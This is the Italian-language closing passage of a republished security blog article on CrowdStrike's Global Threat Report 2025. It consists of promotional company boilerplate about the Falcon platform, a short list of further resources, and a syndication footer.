CrowdStrike ha rivoluzionato la cybersecurity con un approccio basato sugli avversari grazie alla piattaforma CrowdStrike Falcon®, che rappresenta il gold standard della sicurezza informatica, offrendo protezione potenziata dall’AI, threat intelligence in tempo reale e threat hunting avanzato per proteggere identità, cloud ed endpoint. Grazie all’Intelligenza Artificiale comportamentale e al machine learning addestrati sulla base della threat intelligence e di trilioni di eventi di sicurezza, CrowdStrike offre una protezione in tempo reale contro le minacce avanzate, fornendo visibilità e protezione complete lungo l’intero ciclo di vita dell’attacco.

Ulteriori risorse

• Scarica il Global Threat Report 2025 di CrowdStrike.
• Visita l’Adversary Universe di CrowdStrike per conoscere la fonte online completa sugli avversari.
• Ascolta il podcast Adversary Universe per ottenere approfondimenti sugli attori delle minacce e raccomandazioni per amplificare le pratiche di sicurezza.

L'articolo Global Threat Report 2025 di CrowdStrike: In crescita la minaccia Cinese e l’utilizzo malevolo delle AI proviene da il blog della sicurezza informatica.